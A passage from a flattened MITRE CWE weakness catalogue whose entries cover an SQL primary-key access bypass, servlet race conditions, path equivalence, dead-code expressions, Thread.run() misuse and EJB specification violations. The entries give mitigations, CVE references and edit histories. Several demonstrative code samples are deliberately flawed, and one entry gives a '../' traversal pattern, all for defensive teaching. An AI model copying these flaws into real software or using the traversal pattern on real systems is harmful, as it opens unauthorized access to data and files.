actor, but it executes a SQL statement with a primary key that can be controlled by that actor. - - When a user can set a primary key to any value, then the user can modify the key to point to unauthorized records. - Database access control errors occur when: - - - Data enters a program from an untrusted source. - The data is used to specify the value of a primary key in a SQL query. - The untrusted source does not have the permissions to be able to access all rows in the associated table. - - - - - - - - - - - - Architecture and Design - COMMISSION: This weakness refers to an incorrect design related to an architectural security tactic. - - - Implementation - - - - - Confidentiality - Integrity - Access Control - Read Application Data - Modify Application Data - Bypass Protection Mechanism - - - - - Implementation - Assume all input is malicious. Use a standard input validation mechanism to validate all input for length, type, syntax, and business rules before accepting the data. Use an "accept known good" validation strategy. - - - Implementation - Use a parameterized query AND make sure that the accepted values conform to the business rules. Construct your SQL statement accordingly. - - - - - The following code uses a parameterized statement, which escapes metacharacters and prevents SQL injection vulnerabilities, to construct and execute a SQL query that searches for an invoice matching the specified identifier [1]. The identifier is selected from a list of all invoices associated with the current authenticated user. - - ...conn = new SqlConnection(_ConnectionString);conn.Open();int16 id = System.Convert.ToInt16(invoiceID.Text);SqlCommand query = new SqlCommand( "SELECT * FROM invoices WHERE id = @id", conn);query.Parameters.AddWithValue("@id", id);SqlDataReader objReader = objCommand.ExecuteReader();... - - The problem is that the developer has not considered all of the possible values of id. Although the interface generates a list of invoice identifiers that belong to the current user, an attacker can bypass this interface to request any desired invoice. Because the code in this example does not check to ensure that the user has permission to access the requested invoice, it will display any invoice, even if it does not belong to the current user. - - - - - SFP25 - Tainted input to variable - - - - - Anonymous Tool Vendor (under NDA) - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Potential_Mitigations, Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Other_Notes, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2009-07-27 - updated Demonstrative_Examples, Description, Other_Notes, Potential_Mitigations, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2010-06-21 - updated Description - - - CWE Content Team - MITRE - 2011-03-29 - updated Applicable_Platforms, Demonstrative_Examples, Name - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms, Modes_of_Introduction, Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - Access Control Bypass Through User-Controlled SQL Primary Key - - - - The product does not properly synchronize shared data, such as static variables across threads, which can lead to undefined behavior and unpredictable data changes. - - Within servlets, shared static variables are not protected from concurrent access, but servlets are multithreaded. This is a typical programming mistake in J2EE applications, since the multithreading is handled by the framework. When a shared variable can be influenced by an attacker, one thread could wind up modifying the variable to contain data that is not valid for a different thread that is also using the data within the variable. - Note that this weakness is not unique to servlets. - - - - - - - - - - - - - Architecture and Design - - - Implementation - - - - - Confidentiality - Integrity - Availability - Read Application Data - Modify Application Data - DoS: Instability - DoS: Crash, Exit, or Restart - If the shared variable contains sensitive data, it may be manipulated or displayed in another user session. If this data is used to control the application, its value can be manipulated to cause the application to crash or perform poorly. - - - - - Implementation - Remove the use of static variables used between servlets. If this cannot be avoided, use synchronized access for these variables. - - - - - The following code implements a basic counter for how many times the page has been accesed. - - public static class Counter extends HttpServlet {static int count = 0;protected void doGet(HttpServletRequest in, HttpServletResponse out)throws ServletException, IOException {out.setContentType("text/plain");PrintWriter p = out.getWriter();count++;p.println(count + " hits so far!");}} - - Consider when two separate threads, Thread A and Thread B, concurrently handle two different requests: - - - - Assume this is the first occurrence of doGet, so the value of count is 0. - - - doGet() is called within Thread A. - - - The execution of doGet() in Thread A continues to the point AFTER the value of the count variable is read, then incremented, but BEFORE it is saved back to count. At this stage, the incremented value is 1, but the value of count is 0. - - - doGet() is called within Thread B, and due to a higher thread priority, Thread B progresses to the point where the count variable is accessed (where it is still 0), incremented, and saved. After the save, count is 1. - - - Thread A continues. It saves the intermediate, incremented value to the count variable - but the incremented value is 1, so count is "re-saved" to 1. - - - - At this point, both Thread A and Thread B print that one hit has been seen, even though two separate requests have been processed. The value of count should be 2, not 1. - While this example does not have any real serious implications, if the shared variable in question is used for resource tracking, then resource consumption could occur. Other scenarios exist. - - - - - VNA00-J - Ensure visibility when accessing shared primitive variables - - - VNA02-J - Ensure that compound operations on shared variables are atomic - - - SFP19 - Missing Lock - - - - - - - - CWE Community - 2006-12-15 - Submitted by members of the CWE community to extend early CWE versions - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Other_Notes - - - CWE Content Team - MITRE - 2010-09-27 - updated Other_Notes - - - CWE Content Team - MITRE - 2010-12-09 - Critical - Made name and description more specific to match the essence of the rest of the entry. - - - CWE Content Team - MITRE - 2010-12-13 - updated Applicable_Platforms, Common_Consequences, Demonstrative_Examples, Description, Name, Other_Notes, Potential_Mitigations, Relationships - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2013-07-17 - updated Relationships - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms - - - CWE Content Team - MITRE - 2019-01-03 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2020-08-20 - updated Relationships - - - CWE Content Team - MITRE - 2020-12-10 - updated Relationships - - Unsynchronized Access to Shared Data - - - - The software contains a finalize() method that does not call super.finalize(). - The Java Language Specification states that it is a good practice for a finalize() method to call super.finalize(). - - - - - - - - - - Implementation - - - - - Other - Quality Degradation - - - - - Implementation - Call the super.finalize() method. - - - Testing - Use static analysis tools to spot such issues in your code. - - - - - The following method omits the call to super.finalize(). - - protected void finalize() {discardNative();} - - - - - - MET12-J - Do not use finalizers - - - SFP28 - Unexpected access points - - - - - CWE Community - 2006-12-15 - Submitted by members of the CWE community to extend early CWE versions - - - Eric Dalci - Cigital - 2008-07-01 - updated Potential_Mitigations, Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Other_Notes - - - CWE Content Team - MITRE - 2009-10-29 - updated Description, Other_Notes - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2011-06-27 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2019-01-03 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - Erroneous Finalize Method - - - - The software contains protection mechanisms to restrict access to 'realdir/filename', but it constructs pathnames using external input in the form of 'fakedir/../realdir/filename' that are not handled by those mechanisms. This allows attackers to perform unauthorized actions against the targeted file. - - - - - - - - - Implementation - - - - - Confidentiality - Integrity - Read Files or Directories - Modify Files or Directories - - - - - Implementation - Input Validation - Inputs should be decoded and canonicalized to the application's current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked. - - - - - CVE-2001-1152 - Proxy allows remote attackers to bypass denylist restrictions and connect to unauthorized web servers by modifying the requested URL, including (1) a // (double slash), (2) a /SUBDIR/.. where the desired file is in the parentdir, (3) a /./, or (4) URL-encoded characters. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1152 - - - CVE-2000-0191 - application check access for restricted URL before canonicalization - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0191 - - - CVE-2005-1366 - CGI source disclosure using "dirname/../cgi-bin" - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1366 - - - - - dirname/fakechild/../realchild/filename - - - SFP16 - Path Traversal - - - - This is a manipulation that uses an injection for one consequence (containment violation using relative path) to achieve a different consequence (equivalence by alternate name). - - - - PLOVER - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Other_Notes, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2008-10-14 - updated Description, Name, Observed_Examples, Other_Notes, Theoretical_Notes - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Observed_Examples, Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - CWE Content Team - MITRE - 2020-06-25 - updated Observed_Examples, Potential_Mitigations - - Path Issue - dirname/fakechild/../realchild/filename - Path Equivalence: 'dirname/fakechild/../realchild/filename' - - - - The software contains an expression that will always evaluate to false. - - - - - - - - - - Implementation - - - - - Other - Quality Degradation - Varies by Context - - - - - Testing - Use Static Analysis tools to spot such conditions. - - - - - In the following Java example the updateUserAccountOrder() method used within an e-business product ordering/inventory application will validate the product number that was ordered and the user account number. If they are valid, the method will update the product inventory, the user account, and the user order appropriately. - - - public void updateUserAccountOrder(String productNumber, String accountNumber) { - boolean isValidProduct = false;boolean isValidAccount = false; - if (validProductNumber(productNumber)) {isValidProduct = true;updateInventory(productNumber);}else {return;} - if (validAccountNumber(accountNumber)) {isValidProduct = true;updateAccount(accountNumber, productNumber);} - if (isValidProduct && isValidAccount) {updateAccountOrder(accountNumber, productNumber);} - } - - However, the method never sets the isValidAccount variable after initializing it to false so the isValidProduct is mistakenly used twice. The result is that the expression "isValidProduct && isValidAccount" will always evaluate to false, so the updateAccountOrder() method will never be invoked. This will create serious problems with the product ordering application since the user account and inventory databases will be updated but the order will not be updated. - This can be easily corrected by updating the appropriate variable. - - ...if (validAccountNumber(accountNumber)) {isValidAccount = true;updateAccount(accountNumber, productNumber);}... - - - - In the following example, the hasReadWriteAccess method uses bit masks and bit operators to determine if a user has read and write privileges for a particular process. The variable mask is defined as a bit mask from the BIT_READ and BIT_WRITE constants that have been defined. The variable mask is used within the predicate of the hasReadWriteAccess method to determine if the userMask input parameter has the read and write bits set. - - #define BIT_READ 0x0001 // 00000001#define BIT_WRITE 0x0010 // 00010000 - unsigned int mask = BIT_READ & BIT_WRITE; /* intended to use "|" */ - // using "&", mask = 00000000// using "|", mask = 00010001 - // determine if user has read and write accessint hasReadWriteAccess(unsigned int userMask) { - // if the userMask has read and write bits set// then return 1 (true)if (userMask & mask) {return 1;} - // otherwise return 0 (false)return 0; - } - - However the bit operator used to initialize the mask variable is the AND operator rather than the intended OR operator (CWE-480), this resulted in the variable mask being set to 0. As a result, the if statement will always evaluate to false and never get executed. - The use of bit masks, bit operators and bitwise operations on variables can be difficult. If possible, try to use frameworks or libraries that provide appropriate functionality and abstract the implementation. - - - In the following example, the updateInventory method used within an e-business inventory application will update the inventory for a particular product. This method includes an if statement with an expression that will always evaluate to false. This is a common practice in C/C++ to introduce debugging statements quickly by simply changing the expression to evaluate to true and then removing those debugging statements by changing expression to evaluate to false. This is also a common practice for disabling features no longer needed. - - int updateInventory(char* productNumber, int numberOfItems) { - - int initCount = getProductCount(productNumber); - int updatedCount = initCount + numberOfItems; - int updated = updateProductCount(updatedCount); - // if statement for debugging purposes onlyif (1 == 0) { - - char productName[128];productName = getProductName(productNumber); - printf("product %s initially has %d items in inventory \n", productName, initCount);printf("adding %d items to inventory for %s \n", numberOfItems, productName); - if (updated == 0) {printf("Inventory updated for product %s to %d items \n", productName, updatedCount);} - else {printf("Inventory not updated for product: %s \n", productName);} - - } - return updated; - } - - - Using this practice for introducing debugging statements or disabling features creates dead code that can cause problems during code maintenance and potentially introduce vulnerabilities. To avoid using expressions that evaluate to false for debugging purposes a logging API or debugging API should be used for the output of debugging messages. - - - - - MSC00-C - Compile cleanly at high warning levels - - - SFP1 - Glitch in computation - - - - - CWE Community - 2006-12-15 - Submitted by members of the CWE community to extend early CWE versions - - - Eric Dalci - Cigital - 2008-07-01 - updated Potential_Mitigations, Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Other_Notes - - - CWE Content Team - MITRE - 2008-11-24 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2009-07-27 - updated Demonstrative_Examples, Other_Notes, Potential_Mitigations - - - CWE Content Team - MITRE - 2009-10-29 - updated Demonstrative_Examples - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2011-06-27 - updated Common_Consequences - - - CWE Content Team - MITRE - 2011-09-13 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms, Demonstrative_Examples, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships, Type - - - CWE Content Team - MITRE - 2020-08-20 - updated Relationships - - - - - The software contains an expression that will always evaluate to true. - - - - - - - - - - Implementation - - - - - Other - Quality Degradation - Varies by Context - - - - - Testing - Use Static Analysis tools to spot such conditions. - - - - - In the following Java example the updateInventory() method used within an e-business product ordering/inventory application will check if the input product number is in the store or in the warehouse. If the product is found, the method will update the store or warehouse database as well as the aggregate product database. If the product is not found, the method intends to do some special processing without updating any database. - - - public void updateInventory(String productNumber) { - boolean isProductAvailable = false;boolean isDelayed = false; - if (productInStore(productNumber)) {isProductAvailable = true;updateInStoreDatabase(productNumber);}else if (productInWarehouse(productNumber)) {isProductAvailable = true;updateInWarehouseDatabase(productNumber);}else {isProductAvailable = true;} - if ( isProductAvailable ) {updateProductDatabase(productNumber);}else if ( isDelayed ) { - - - /* Warn customer about delay before order processing */ - ... - } - } - - However, the method never sets the isDelayed variable and instead will always update the isProductAvailable variable to true. The result is that the predicate testing the isProductAvailable boolean will always evaluate to true and therefore always update the product database. Further, since the isDelayed variable is initialized to false and never changed, the expression always evaluates to false and the customer will never be warned of a delay on their product. - - - - - MSC00-C - Compile cleanly at high warning levels - - - SFP1 - Glitch in computation - - - - - CWE Community - 2006-12-15 - Submitted by members of the CWE community to extend early CWE versions - - - Eric Dalci - Cigital - 2008-07-01 - updated Potential_Mitigations, Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Other_Notes - - - CWE Content Team - MITRE - 2008-11-24 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2009-07-27 - updated Demonstrative_Examples, Other_Notes, Potential_Mitigations - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2011-06-27 - updated Common_Consequences - - - CWE Content Team - MITRE - 2011-09-13 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships, Type - - - CWE Content Team - MITRE - 2020-08-20 - updated Relationships - - - - - The program calls a thread's run() method instead of calling start(), which causes the code to run in the thread of the caller instead of the callee. - In most cases a direct call to a Thread object's run() method is a bug. The programmer intended to begin a new thread of control, but accidentally called run() instead of start(), so the run() method will execute in the caller's thread of control. - - - - - - - - - Implementation - - - - - Other - Quality Degradation - Varies by Context - - - - - Implementation - Use the start() method instead of the run() method. - - - - - The following excerpt from a Java program mistakenly calls run() instead of start(). - - Thread thr = new Thread() {public void run() {...}}; - thr.run(); - - - - - System Process - - - - THI00-J - Do not invoke Thread.run() - - - SFP3 - Use of an improper API - - - - - CWE Community - 2006-12-15 - Submitted by members of the CWE community to extend early CWE versions - - - Eric Dalci - Cigital - 2008-07-01 - updated Potential_Mitigations, Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Other_Notes - - - CWE Content Team - MITRE - 2009-05-27 - updated Demonstrative_Examples - - - CWE Content Team - MITRE - 2009-07-27 - updated Description, Other_Notes - - - CWE Content Team - MITRE - 2010-09-27 - updated Relationships - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2011-06-27 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2017-11-08 - updated Relationships - - - CWE Content Team - MITRE - 2019-01-03 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - Call to Thread.run() - - - - The software does not follow or incorrectly follows the specifications as required by the implementation language, environment, framework, protocol, or platform. - When leveraging external functionality, such as an API, it is important that the caller does so in accordance with the requirements of the external functionality or else unintended behaviors may result, possibly leaving the system vulnerable to any number of exploits. - - - - - - Primary - - - - - Implementation - - - - - Other - Quality Degradation - Varies by Context - - - - - CVE-2006-7140 - Crypto implementation removes padding when it shouldn't, allowing forged signatures - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-7140 - - - CVE-2006-4339 - Crypto implementation removes padding when it shouldn't, allowing forged signatures - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4339 - - - - - MET10-J - Follow the general contract when implementing the compareTo() method - - - - - CWE Community - 2006-12-15 - Submitted by members of the CWE community to extend early CWE versions - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Description, Relationships - - - CWE Content Team - MITRE - 2011-03-29 - updated Description, Name - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2011-06-27 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships - - - CWE Content Team - MITRE - 2017-01-19 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Observed_Examples, Relationships - - - CWE Content Team - MITRE - 2019-01-03 - updated Relationships, Taxonomy_Mappings, Weakness_Ordinalities - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - Failure to Follow Specification - - - - The program violates the Enterprise JavaBeans (EJB) specification by using thread synchronization primitives. - The Enterprise JavaBeans specification requires that every bean provider follow a set of programming guidelines designed to ensure that the bean will be portable and behave consistently in any EJB container. In this case, the program violates the following EJB guideline: "An enterprise bean must not use thread synchronization primitives to synchronize execution of multiple instances." The specification justifies this requirement in the following way: "This rule is required to ensure consistent runtime semantics because while some EJB containers may use a single JVM to execute all enterprise bean's instances, others may distribute the instances across multiple JVMs." - - - - - - - - - - Architecture and Design - - - Implementation - - - - - Other - Quality Degradation - - - - - Implementation - Do not use Synchronization Primitives when writing EJBs. - - - - - In the following Java example a Customer Entity EJB provides access to customer information in a database for a business application. - - @Entitypublic class Customer implements Serializable { - - private String id;private String firstName;private String lastName;private Address address; - public Customer() {...} - public Customer(String id, String firstName, String lastName) {...} - @Idpublic String getCustomerId() {...} - public synchronized void setCustomerId(String id) {...} - public String getFirstName() {...} - public synchronized void setFirstName(String firstName) {...} - public String getLastName() {...} - public synchronized void setLastName(String lastName) {...} - @OneToOne()public Address getAddress() {...} - public synchronized void setAddress(Address address) {...} - } - - However, the customer entity EJB uses the synchronized keyword for the set methods to attempt to provide thread safe synchronization for the member variables. The use of synchronized methods violate the restriction of the EJB specification against the use synchronization primitives within EJBs. Using synchronization primitives may cause inconsistent behavior of the EJB when used within different EJB containers. - - - - - SFP3 - Use of an improper API - - - - - CWE Community - 2006-12-15 - Submitted by members of the CWE community to extend early CWE versions - - - Eric Dalci - Cigital - 2008-07-01 - updated Potential_Mitigations, Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Other_Notes - - - CWE Content Team - MITRE - 2009-10-29 - updated Description, Other_Notes - - - CWE Content Team - MITRE - 2010-04-05 - updated Demonstrative_Examples - - - CWE Content Team - MITRE - 2010-09-27 - updated Relationships - - - CWE Content Team - MITRE - 2010-12-13 - updated Relationships - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2011-06-27 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - - - The program violates the Enterprise JavaBeans (EJB) specification by using AWT/Swing. - The Enterprise JavaBeans specification requires that every bean provider follow a set of programming guidelines designed to ensure that the bean will be portable and behave consistently in any EJB container. In this case, the program violates the following EJB guideline: "An enterprise bean must not use the AWT functionality to attempt to output information to a display, or to input information from a keyboard." The specification justifies this requirement in the following way: "Most servers do not allow direct interaction between an application program and a keyboard/display attached to the server system." - - - - - - - - - Architecture and Design - - - Implementation - - - - - Other - Quality Degradation - - - - - Architecture and Design - Do not use AWT/Swing when writing EJBs. - - - - - The following Java example is a simple converter class for converting US dollars to Yen. This converter class demonstrates the improper practice of using a stateless session Enterprise JavaBean that implements an AWT Component and AWT keyboard event listener to retrieve keyboard input from the user for the amount of the US dollars to convert to Yen. - - @Statelesspublic class ConverterSessionBean extends Component implements KeyListener, ConverterSessionRemote { - - - /* member variables for receiving keyboard input using AWT API */ - - ...private StringBuffer enteredText = new StringBuffer(); - - /* conversion rate on US dollars to Yen */ - - private BigDecimal yenRate = new BigDecimal("115.3100"); - public ConverterSessionBean() { - super(); - /* method calls for setting up AWT Component for receiving keyboard input */ - - ...addKeyListener(this); - } - public BigDecimal dollarToYen(BigDecimal dollars) {BigDecimal result = dollars.multiply(yenRate);return result.setScale(2, BigDecimal.ROUND_DOWN);} - - /* member functions for implementing AWT KeyListener interface */ - - public void keyTyped(KeyEvent event) {...} - public void keyPressed(KeyEvent e) {} - public void keyReleased(KeyEvent e) {} - - /* member functions for receiving keyboard input and displaying output */ - - public void paint(Graphics g) {...} - ... - } - - This use of the AWT and Swing APIs within any kind of Enterprise JavaBean not only violates the restriction of the EJB specification against using AWT or Swing within an EJB but also violates the intended use of Enterprise JavaBeans to separate business logic from presentation logic. - The Stateless Session Enterprise JavaBean should contain only business logic. Presentation logic should be provided by some other mechanism such as Servlets or Java Server Pages (JSP) as in the following Java/JSP example. - - @Statelesspublic class ConverterSessionBean implements ConverterSessionRemoteInterface { - - - /* conversion rate on US dollars to Yen */ - private BigDecimal yenRate = new BigDecimal("115.3100"); - public ConverterSessionBean() {} - - /* remote method to convert US dollars to Yen */ - - public BigDecimal dollarToYen(BigDecimal dollars) {BigDecimal result = dollars.multiply(yenRate);return result.setScale(2, BigDecimal.ROUND_DOWN);} - } - - - <%@ page import="converter.ejb.Converter, java.math.*, javax.naming.*"%><%! - private Converter converter = null;public void jspInit() {try {InitialContext ic = new InitialContext();converter = (Converter) ic.lookup(Converter.class.getName());} catch (Exception ex) {System.out.println("Couldn't create converter bean."+ ex.getMessage());}}public void jspDestroy() {converter = null;} - - %><html> - <head><title>Converter</title></head><body bgcolor="white"> - <h1>Converter</h1><hr><p>Enter an amount to convert:</p><form method="get"><input type="text" name="amount" size="25"><br><p><input type="submit" value="Submit"><input type="reset" value="Reset"></form><%String amount = request.getParameter("amount");if ( amount != null && amount.length() > 0 ) {BigDecimal d = new BigDecimal(amount);BigDecimal yenAmount = converter.dollarToYen(d); - - %><p><%= amount %> dollars are <%= yenAmount %> Yen.<p><%} - %> - </body> - </html> - - - - - - SFP3 - Use of an improper API - - - - - CWE Community - 2006-12-15 - Submitted by members of the CWE community to extend early CWE versions - - - Eric Dalci - Cigital - 2008-07-01 - updated Potential_Mitigations, Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Other_Notes - - - CWE Content Team - MITRE - 2009-10-29 - updated Description, Other_Notes - - - CWE Content Team - MITRE - 2009-12-28 - updated Demonstrative_Examples, Potential_Mitigations - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2011-06-27 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - - - The program violates the Enterprise JavaBeans (EJB) specification by using the java.io package. - The Enterprise JavaBeans specification requires that every bean provider follow a set of programming guidelines designed to ensure that the bean will be portable and behave consistently in any EJB container. In this case, the program violates the following EJB guideline: "An enterprise bean must not use the java.io package to attempt to access files and directories in the file system." The specification justifies this requirement in the following way: "The file system APIs are not well-suited for business components to access data. Business components should use a resource manager API, such as JDBC, to store data." - - - - - - - - - Architecture and Design - - - Implementation - - - - - Other - Quality Degradation - - - - - Implementation - Do not use Java I/O when writing EJBs. - - - - - The following Java example is a simple stateless Enterprise JavaBean that retrieves the interest rate for the number of points for a mortgage. In this example, the interest rates for various points are retrieved from an XML document on the local file system, and the EJB uses the Java I/O API to retrieve the XML document from the local file system. - - @Statelesspublic class InterestRateBean implements InterestRateRemote { - - private Document interestRateXMLDocument = null;private File interestRateFile = null; - public InterestRateBean() { - try { - - - /* get XML document from the local filesystem */ - interestRateFile = new File(Constants.INTEREST_RATE_FILE); - if (interestRateFile.exists()){DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();DocumentBuilder db = dbf.newDocumentBuilder();interestRateXMLDocument = db.parse(interestRateFile);} - } catch (IOException ex) {...} - } - public BigDecimal getInterestRate(Integer points) {return getInterestRateFromXML(points);} - - /* member function to retrieve interest rate from XML document on the local file system */ - - private BigDecimal getInterestRateFromXML(Integer points) {...} - } - - This use of the Java I/O API within any kind of Enterprise JavaBean violates the EJB specification by using the java.io package for accessing files within the local filesystem. - An Enterprise JavaBean should use a resource manager API for storing and accessing data. In the following example, the private member function getInterestRateFromXMLParser uses an XML parser API to retrieve the interest rates. - - @Statelesspublic class InterestRateBean implements InterestRateRemote { - - public InterestRateBean() {} - public BigDecimal getInterestRate(Integer points) {return getInterestRateFromXMLParser(points);} - - /* member function to retrieve interest rate from XML document using an XML parser API */ - - private BigDecimal getInterestRateFromXMLParser(Integer points) {...} - } - - - - - - SFP3 - Use of an improper API - - - - - CWE Community - 2006-12-15 - Submitted by members of the CWE community to extend early CWE versions - - - Eric Dalci - Cigital - 2008-07-01 - updated Potential_Mitigations, Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Other_Notes - - - CWE Content Team - MITRE - 2009-10-29 - updated Description, Other_Notes - - - CWE Content Team - MITRE - 2009-12-28 - updated Demonstrative_Examples - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2011-06-27 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - - - The program violates the Enterprise JavaBeans (EJB) specification by using sockets. - The Enterprise JavaBeans specification requires that every bean provider follow a set of programming guidelines designed to ensure that the bean will be portable and behave consistently in any EJB container. In this case, the program violates the following EJB guideline: "An enterprise bean must not attempt to listen on a socket, accept connections on a socket, or use a socket for multicast." The specification justifies this requirement in the following way: "The EJB architecture allows an enterprise bean instance to be a network socket client, but it does not allow it to be a network server. Allowing the instance to become a network server would conflict with the basic function of the enterprise bean-- to serve the EJB clients." - - - - - - - - - Architecture and Design - - - Implementation - - - - - Other - Quality Degradation - - - - - Architecture and Design - Implementation - Do not use Sockets when writing EJBs. - - - - - The following Java example is a simple stateless Enterprise JavaBean that retrieves stock symbols and stock values. The Enterprise JavaBean creates a socket and listens for and accepts connections from clients on the socket. - - @Statelesspublic class StockSymbolBean implements StockSymbolRemote { - - ServerSocket serverSocket = null;Socket clientSocket = null; - public StockSymbolBean() { - try {serverSocket = new ServerSocket(Constants.SOCKET_PORT);} catch (IOException ex) {...} - try {clientSocket = serverSocket.accept();} catch (IOException e) {...} - } - public String getStockSymbol(String name) {...} - public BigDecimal getStockValue(String symbol) {...} - private void processClientInputFromSocket() {...} - } - - And the following Java example is similar to the previous example but demonstrates the use of multicast socket connections within an Enterprise JavaBean. - - @Statelesspublic class StockSymbolBean extends Thread implements StockSymbolRemote { - - ServerSocket serverSocket = null;Socket clientSocket = null;boolean listening = false; - public StockSymbolBean() { - try {serverSocket = new ServerSocket(Constants.SOCKET_PORT);} catch (IOException ex) {...} - listening = true;while(listening) {start();} - } - public String getStockSymbol(String name) {...} - public BigDecimal getStockValue(String symbol) {...} - public void run() {try {clientSocket = serverSocket.accept();} catch (IOException e) {...}...} - - } - - The previous two examples within any type of Enterprise JavaBean violate the EJB specification by attempting to listen on a socket, accepting connections on a socket, or using a socket for multicast. - - - - - SFP3 - Use of an improper API - - - - - CWE Community - 2006-12-15 - Submitted by members of the CWE community to extend early CWE versions - - - Eric Dalci - Cigital - 